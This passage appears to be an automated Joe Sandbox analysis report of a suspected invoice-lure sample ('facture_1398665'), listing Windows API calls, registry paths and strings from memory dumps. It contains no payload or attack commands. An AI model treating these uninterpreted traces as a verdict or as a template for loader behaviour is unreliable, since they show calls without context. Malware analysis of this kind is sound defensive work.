    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 00431F8C: EnterCriticalSection.KERNEL32(0050AF20,00000000,004340D5,00000000,?,?,00435A5E,004364EC,00000000,?,?), ref: 00431F94
      • Part of subcall function 00431F8C: LeaveCriticalSection.KERNEL32(0050AF20,0050AF20,00000000,004340D5,00000000,?,?,00435A5E,004364EC,00000000,?,?), ref: 00431FA1
      • Part of subcall function 00431F8C: EnterCriticalSection.KERNEL32(?,0050AF20,0050AF20,00000000,004340D5,00000000,?,?,00435A5E,004364EC,00000000,?,?), ref: 00431FAA
    • SaveDC.GDI32(?), ref: 004765D9
    • ExcludeClipRect.GDI32(?,?,?,?,?), ref: 00476654
    • GetStockObject.GDI32(00000004), ref: 00476673
    • FillRect.USER32(00000000,?,00000000), ref: 0047668C
      • Part of subcall function 004306C0: GetSysColor.USER32(00432508), ref: 004306CA
    • SetBkColor.GDI32(00000000,00000000), ref: 004766D7
      • Part of subcall function 00431E8C: FillRect.USER32(?,?,00000000), ref: 00431EB5
    • RestoreDC.GDI32(?,?), ref: 00476702
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 00470A2C: IsIconic.USER32(?), ref: 00470A48
    • SetActiveWindow.USER32(?), ref: 0047BD2E
    • ShowWindow.USER32(00000000,00000009), ref: 0047BD51
    • IsWindowEnabled.USER32(00000000), ref: 0047BD73
    • DefWindowProcW.USER32(?,00000112,0000F120,00000000), ref: 0047BD8F
      • Part of subcall function 0047A6CC: ShowWindow.USER32(00000000,00000009), ref: 0047A6E7
    • SetWindowPos.USER32(?,00000000,00000000,?,?,0047B69E,00000000), ref: 0047BDDB
    • SetFocus.USER32(00000000), ref: 0047BE29
      • Part of subcall function 00474F08: ShowWindow.USER32(00000000,?), ref: 00474F3E
      • Part of subcall function 0047B024: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000213), ref: 0047B075
      • Part of subcall function 0047B184: EnumWindows.USER32(0047B090,00000000), ref: 0047B1BB
      • Part of subcall function 0047B184: ShowWindow.USER32(?,00000000), ref: 0047B1F2
      • Part of subcall function 0047B184: ShowOwnedPopups.USER32(00000000,?), ref: 0047B221
      • Part of subcall function 0047B184: ShowWindow.USER32(?,00000005), ref: 0047B289
      • Part of subcall function 0047B184: ShowOwnedPopups.USER32(00000000,?), ref: 0047B2B8
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetSystemMetrics.USER32(0000000B), ref: 004333E6
    • GetSystemMetrics.USER32(0000000C), ref: 004333F2
    • GetDC.USER32(00000000), ref: 0043340E
    • GetDeviceCaps.GDI32(00000000,0000000E), ref: 00433435
    • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00433442
    • ReleaseDC.USER32(00000000,00000000), ref: 0043347B
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • SetLastError.KERNEL32(00000057,00000000,004B8FC3,?,?,?,00000000), ref: 004B8F62
    • SetLastError.KERNEL32(00000000,00000002,?,?,?,004B9064,?,00000000,004B8FC3,?,?,?,00000000), ref: 004B8FA1
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetWindowLongW.USER32(?,000000EC), ref: 004E0710
    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 004E073F
    • GetWindowLongW.USER32(?,000000EC), ref: 004E0754
    • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004E077A
    • ShowWindow.USER32(?,00000005), ref: 004E0793
    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000057), ref: 004E07B4
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 004336A4: GetObjectW.GDI32(?,00000054), ref: 004336B8
    • CreateCompatibleDC.GDI32(00000000), ref: 0043381A
    • SelectPalette.GDI32(?,?,00000000), ref: 0043383B
    • RealizePalette.GDI32(?), ref: 00433847
    • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0043385E
    • SelectPalette.GDI32(?,00000000,00000000), ref: 00433886
    • DeleteDC.GDI32(?), ref: 0043388F
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • CreateCompatibleDC.GDI32(00000000), ref: 0043305D
    • SelectObject.GDI32(00000000,00000000), ref: 00433066
    • GetDIBColorTable.GDI32(00000000,00000000,00000100,?), ref: 0043307A
    • SelectObject.GDI32(00000000,00000000), ref: 00433086
    • DeleteDC.GDI32(00000000), ref: 0043308C
    • CreatePalette.GDI32 ref: 004330D3
      • Part of subcall function 00432FAC: GetDC.USER32(00000000), ref: 00432FC4
      • Part of subcall function 00432FAC: GetDeviceCaps.GDI32(?,00000068), ref: 00432FE0
      • Part of subcall function 00432FAC: GetPaletteEntries.GDI32(870801FD,00000000,00000008,?), ref: 00432FF8
      • Part of subcall function 00432FAC: GetPaletteEntries.GDI32(870801FD,00000008,00000008,?), ref: 00433010
      • Part of subcall function 00432FAC: ReleaseDC.USER32(00000000,?), ref: 0043302C
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,004023AC), ref: 004018D8
      • Part of subcall function 00401870: Sleep.KERNEL32(00000000,004018F3,00000000,?,00101000,00000004,?,?,?,?,004023AC), ref: 00401886
      • Part of subcall function 00401870: Sleep.KERNEL32(0000000A,00000000,004018F3,00000000,?,00101000,00000004,?,?,?,?,004023AC), ref: 0040189F
    • Sleep.KERNEL32(00000000,?,004023AC), ref: 00401BC3
    • Sleep.KERNEL32(0000000A,00000000,?,004023AC), ref: 00401BD9
    • Sleep.KERNEL32(00000000,?,?,?,004023AC), ref: 00401C07
    • Sleep.KERNEL32(0000000A,00000000,?,?,?,004023AC), ref: 00401C1D
    • Sleep.KERNEL32(00000000,?,004023AC), ref: 00401D4C
    • Sleep.KERNEL32(0000000A,00000000,?,004023AC), ref: 00401D62
      • Part of subcall function 004017F8: VirtualAlloc.KERNEL32(00000000,0013FFF0,00001000,00000004,?,00401E07,?,004023AC), ref: 0040180E
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetDC.USER32(00000000), ref: 00442CB0
    • GetTextMetricsW.GDI32(?,?), ref: 00442CCE
      • Part of subcall function 00430D88: CreateFontIndirectW.GDI32(?), ref: 00430F23
    • SelectObject.GDI32(?,00000000), ref: 00442CE3
    • GetTextMetricsW.GDI32(?,?), ref: 00442CF2
    • SelectObject.GDI32(?,00000000), ref: 00442CFC
    • ReleaseDC.USER32(00000000,?), ref: 00442D14
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 0043170C: CreateBrushIndirect.GDI32(?), ref: 004317B7
    • UnrealizeObject.GDI32(00000000), ref: 00432738
    • SelectObject.GDI32(00000000,00000000), ref: 0043274A
    • SetBkColor.GDI32(00000000,00000000), ref: 0043276D
    • SetBkMode.GDI32(00000000,00000002), ref: 00432778
      • Part of subcall function 004306C0: GetSysColor.USER32(00432508), ref: 004306CA
    • SetBkColor.GDI32(00000000,00000000), ref: 00432793
    • SetBkMode.GDI32(00000000,00000001), ref: 0043279E
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004B23D5
    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004B23FC
    • SetForegroundWindow.USER32(?), ref: 004B240D
      • Part of subcall function 0048220C: IsBadWritePtr.KERNEL32(00000000,00000000,00000000,00482297,?,?,00000000,0050B17C,00000703,?,004B2356,?,004B2D6A,00000000,004B2D8D), ref: 0048224F
    • DefWindowProcW.USER32(00000000,?,?,?), ref: 004B26D4
    Strings
    • Cannot evaluate variable because [Code] isn't running yet, xrefs: 004B2550
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,004B035A,?,00000000,004B039A), ref: 004B029D
      • Part of subcall function 0047F714: GetWindowsDirectoryW.KERNEL32(?,00000104,00000000,004AE66B,00000000,004AE916,?,?,00000000,0050B17C,00000000,00000000,00000000,?,004FE26B,00000000), ref: 0047F727
      • Part of subcall function 0047EB44: GetFileAttributesW.KERNEL32(00000000,00000000,004ABD07,00000000,?), ref: 0047EB4F
      • Part of subcall function 0047FD20: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,004803F6,?,00000000,?,00480396,00000001,00000001,00000000,00000000,kernel32.dll,GetUserDefaultUILanguage,00000000,004803F6), ref: 0047FD3C
    Strings
    • WININIT.INI, xrefs: 004B02CC
    • PendingFileRenameOperations, xrefs: 004B0230
    • PendingFileRenameOperations2, xrefs: 004B0266
    • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 004B0214
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetCursorPos.USER32(0050B10C), ref: 00458E65
    • GetCursor.USER32 ref: 00458E81
      • Part of subcall function 00458034: SetCapture.USER32(00000000), ref: 00458043
    • GetDesktopWindow.USER32 ref: 00458F73
      • Part of subcall function 00458B5C: GetDesktopWindow.USER32 ref: 00458BD1
      • Part of subcall function 00458B5C: GetDesktopWindow.USER32 ref: 00458D01
      • Part of subcall function 00458B5C: SetCursor.USER32(00000000), ref: 00458D41
      • Part of subcall function 00458B5C: SetCursor.USER32(00000000), ref: 00458D56
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 0047BF28: SetWindowTextW.USER32(?,00000000), ref: 0047BF58
      • Part of subcall function 0047BF28: SetWindowTextW.USER32(?,00000000), ref: 0047BF6E
    • ShowWindow.USER32(?,00000005), ref: 004FDB1A
      • Part of subcall function 0047F740: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0047F753
      • Part of subcall function 0040DD04: SetCurrentDirectoryW.KERNEL32(00000000,?,004FDB42,00000000,004FDD55,?,00000000,004FDD8E,?,?,00000000,?), ref: 0040DD0F
      • Part of subcall function 0047F29C: GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,0047F333,?,?,?,00000001,?,004B0D32,00000000,004B0D9F), ref: 0047F2D1
      • Part of subcall function 0047F29C: GetCommandLineW.KERNEL32(00000000,0047F333,?,?,?,00000001,?,004B0D32,00000000,004B0D9F,?,?,?,?,00000000), ref: 0047F2E7
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • GetMenuItemInfoW.USER32(00000000,00000000,000000FF,00000030), ref: 00452C55
    • SetMenuItemInfoW.USER32(00000000,00000000,000000FF,00000030), ref: 00452CAD
    • DrawMenuBar.USER32(00000000), ref: 00452CBA
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetKeyboardLayoutNameW.USER32(00000000), ref: 0045270A
      • Part of subcall function 0042E85C: RegCloseKey.ADVAPI32(10AC0000,0042E6D8,00000001,0042E7DA,?,?,0043740E,00000008,00000060,00000048,00000000,004374AE), ref: 0042E870
      • Part of subcall function 0042E8C0: RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,0042EA71), ref: 0042E939
      • Part of subcall function 0042E8C0: RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,00000000,0042EA71), ref: 0042E9A9
      • Part of subcall function 0042E8C0: RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?), ref: 0042EA14
      • Part of subcall function 00413C38: SetErrorMode.KERNEL32(00008000,?), ref: 00413C42
      • Part of subcall function 00413C38: LoadLibraryW.KERNEL32(00000000), ref: 00413C71
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,?,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409644
      • Part of subcall function 00409620: GetProcAddress.KERNEL32(?,00000000,00000000,00409683,?,?,?,00000000,?,004FE94D,00000000,user32.dll,DisableProcessWindowsGhosting,005015C1,00000001,00000000), ref: 00409666
    • FreeLibrary.KERNEL32(?,004527D9,?,00000000,00452819), ref: 004527CC
    Strings
    • KbdLayerDescriptor, xrefs: 00452796
    • \SYSTEM\CurrentControlSet\Control\Keyboard Layouts\, xrefs: 0045274F
    • Layout File, xrefs: 0045276B
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • GetMessagePos.USER32 ref: 004BFF70
    • SendMessageW.USER32(00000000,00001111,00000000,?), ref: 004BFFC2
    • SendMessageW.USER32(00000000,00001102,00000003,00000000), ref: 004BFFE9
      • Part of subcall function 0042E2DC: SendMessageW.USER32(00000000,0000110A,00000009,00000000), ref: 0042E2E9
    • SendMessageW.USER32(00000000,00001102,00000002,00000000), ref: 004C003E
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • SendMessageW.USER32(00000000,00000B06,00000000,00000000), ref: 004B1EBA
      • Part of subcall function 0042BDD0: GetClassInfoW.USER32(00400000,0042BDB4,?), ref: 0042BDF1
      • Part of subcall function 0042BDD0: UnregisterClassW.USER32(0042BDB4,00400000), ref: 0042BE1A
      • Part of subcall function 0042BDD0: RegisterClassW.USER32(00502ED0), ref: 0042BE24
      • Part of subcall function 0042BDD0: SetWindowLongW.USER32(00000000,000000FC,00000000), ref: 0042BE6F
      • Part of subcall function 004809D8: GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00503F6C,004B1F3E,004B2358,004B1E94,00000000,00000B06,00000000,00000000), ref: 004809F1
      • Part of subcall function 004809D8: InterlockedExchange.KERNEL32(0050B1B0,00000001), ref: 00480A08
      • Part of subcall function 004809D8: ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000), ref: 00480A1C
    • SendMessageW.USER32(00000000,00000B00,00000000,00000000), ref: 004B1F57
    Strings
    • Failed to create DebugClientWnd, xrefs: 004B1F20
    • Cannot debug. Debugger version ($%.8x) does not match Setup version ($%.8x), xrefs: 004B1EE6
    • l?P, xrefs: 004B1F2F
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • IsWindowVisible.USER32(00000000), ref: 0047D23C
    • GetWindowLongW.USER32(00000000,000000EC), ref: 0047D27E
    • SetWindowLongW.USER32(00000000,000000EC,00000000), ref: 0047D28F
    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0047D2B7
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
      • Part of subcall function 00408F00: TlsGetValue.KERNEL32(00000000,00000000,004030E2,00000002,00405109,?,?,?,00000002,004051BA,00403127,0040316E,?,00000000), ref: 00408F25
      • Part of subcall function 00408F00: TlsGetValue.KERNEL32(00000000,004030E2,00000002,00405109,?,?,?,00000002,004051BA,00403127,0040316E,?,00000000,?,?,?), ref: 00408F36
    • IsWindow.USER32(?), ref: 00437B91
    • FindWindowExW.USER32(00000000,00000000,OleMainThreadWndClass,00000000), ref: 00437BC2
    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00437BFB
    • GetCurrentThreadId.KERNEL32(?,?,00000000,00437C5E), ref: 00437C02
    Strings
    Memory Dump Source
    • Source File: 00000003.00000001.12813717289.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000001.12813552339.00400000.00000002.sdmp
    • Associated: 00000003.00000001.12816073835.00502000.00000004.sdmp
    • Associated: 00000003.00000001.12816100670.00505000.00000008.sdmp
    • Associated: 00000003.00000001.12816121669.00506000.00000004.sdmp
    • Associated: 00000003.00000001.12816146634.0050A000.00000004.sdmp
    • Associated: 00000003.00000001.12816196033.0050F000.00000008.sdmp
    • Associated: 00000003.00000001.12816213681.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_1_400000_facture_1398665.jbxd
    APIs
    • RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403E8A
    • RegQueryValueExW.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00403ED9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403EBD
    • RegCloseKey.ADVAPI32(?,00403EE0,00000000,?,00000004,00000000,00403ED9,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00403ED3
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.12821870949.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000003.00000002.12821862610.00400000.00000002.sdmp
    • Associated: 00000003.00000002.12827274989.00502000.00000004.sdmp
    • Associated: 00000003.00000002.12827308842.00505000.00000008.sdmp
    • Associated: 00000003.00000002.12827366644.00506000.00000004.sdmp
    • Associated: 00000003.00000002.12827824726.0050A000.00000004.sdmp
    • Associated: 00000003.00000002.12828114266.0050F000.00000008.sdmp
    • Associated: 00000003.00000002.12828164984.00512000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_400000_facture_1398665.jbxd
    APIs
    • MsgWaitForMultipleObjects.USER32(00000001,00000001,00000000,000000FF,000000FF), ref: 004B2F82
    • GetExitCodeProcess.KERNEL32(?,?), ref: 004B2FA5
    • CloseHandle.KERNEL32(?), ref: 004B2FCB
      • Part of subcall function 004ADC34: GetLastError.KERNEL32(00000000,004AE8EE,00000005,00000000,004AE916,?,?,00000000,0050B17C,00000000,00000000,00000000,?,004FE26B,00000000,004FE286), ref: 004ADC37
    Strings
